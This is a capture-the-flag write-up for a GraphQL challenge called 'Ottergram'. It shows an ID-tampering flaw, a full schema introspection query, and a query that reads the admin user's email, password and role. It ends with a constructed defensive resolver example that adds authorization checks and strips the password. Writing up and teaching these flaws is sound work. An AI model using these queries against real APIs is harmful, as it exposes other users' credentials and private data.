# Ottergram

Level: Easy\
Points: 10\
Type: Daily Challenge

After the sign-up / login flow, there is a POST request to `/graphql` which fetches the analytics.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2F0v8NCrJiDZSFJJxDVIkZ%2Fimage.png?alt=media&#x26;token=3898a7e9-3255-4530-b740-43ca28b8d5a9" alt=""><figcaption></figcaption></figure>

Viewing the request in a readable format:

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FYj8A4UtlYJpD8FJa0QdL%2Fimage.png?alt=media&#x26;token=bf0c08dc-e9a0-4f97-ab8d-0c0f2aca3ba3" alt=""><figcaption></figcaption></figure>

We can edit the `userId` field and get the analytics of another user.\
The admin's `userId` is 2.

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2F2cCn4VihALaalMnBpBA8%2Fimage.png?alt=media&#x26;token=e6282c3f-f33a-4a45-98c8-17971c4fa18f" alt=""><figcaption></figcaption></figure>

Dumping the ENTIRE Schema

```
query {
  __schema {
    types {
      name
      fields {
        name
        type {
          name
          kind
        }
      }
    }
  }
}
```

Explanation

```
query
└── __schema              ← the entire schema of the API
    └── types             ← list of ALL types defined
        ├── name          ← name of the type (e.g. "User", "Analytics")
        └── fields        ← list of fields on that type
            ├── name      ← field name (e.g. "username", "password")
            └── type      ← what data type this field returns
                ├── name  ← type name (e.g. "String", "Int")
                └── kind  ← category (SCALAR, OBJECT, NON_NULL, LIST)
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FlzzVdMAyGKBW6NE5ev8U%2Fimage.png?alt=media&#x26;token=b92dcdbd-5785-4c8c-bb03-43ed300ed93c" alt=""><figcaption></figcaption></figure>

### Key Findings

There are **2 queries** and the `User` type has juicy fields:

| Query               | Returns                                   |
| ------------------- | ----------------------------------------- |
| `analytics(userId)` | Analytics                                 |
| `user(???)`         | **User** with `email`, `password`, `role` |

Let's get the username and password data.

```
query {
  user(id: 2) {
    id
    username
    email
    password
    role
  }
}
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FKOpmFvzguj806SfJgWzo%2Fimage.png?alt=media&#x26;token=b12b5ebe-3d48-4c89-9d68-e88cbab6e238" alt=""><figcaption></figcaption></figure>
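
Both queries above work for the same reason: the resolver trusts the client-supplied ID and returns the stored `password` field. The following is an added example, not code from the challenge, showing that pattern beside a resolver with an object-level authorization check. The resolver layout, the `ctx.user` session object and the sample data are assumptions.

```javascript
// Constructed sample data; field names follow the schema dumped above.
const USERS = new Map([
  [1, { id: 1, username: "player", email: "player@example.test", password: "<hash>", role: "user" }],
  [2, { id: 2, username: "admin", email: "admin@example.test", password: "<hash>", role: "admin" }],
]);
const ANALYTICS = new Map([
  [1, { userId: 1, views: 12 }],
  [2, { userId: 2, views: 340 }],
]);

// Vulnerable pattern: any caller can read any record by changing the ID.
const vulnerableResolvers = {
  user: (_parent, args) => USERS.get(Number(args.id)) ?? null,
  analytics: (_parent, args) => ANALYTICS.get(Number(args.userId)) ?? null,
};

// Object-level check. ctx.user is assumed to come from the verified session,
// never from the request body.
function assertCanRead(ctx, ownerId) {
  if (!ctx || !ctx.user) throw new Error("UNAUTHENTICATED");
  if (ctx.user.role !== "admin" && ctx.user.id !== ownerId) throw new Error("FORBIDDEN");
}

// Hardened resolvers: authorize per object and never return the credential.
const hardenedResolvers = {
  user: (_parent, args, ctx) => {
    const id = Number(args.id);
    assertCanRead(ctx, id);
    const record = USERS.get(id);
    if (!record) return null;
    const { password, ...safe } = record; // password stays server-side
    return safe;
  },
  analytics: (_parent, args, ctx) => {
    const ownerId = Number(args.userId);
    assertCanRead(ctx, ownerId);
    return ANALYTICS.get(ownerId) ?? null;
  },
};

// Helper for the demo: returns the resolver's value, or the error code it threw.
function attempt(resolvers, field, args, ctx) {
  try {
    return resolvers[field](null, args, ctx);
  } catch (err) {
    return err.message;
  }
}
```

Removing `password` from the GraphQL `User` type altogether is the stronger fix; the resolver-level strip is a second layer.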
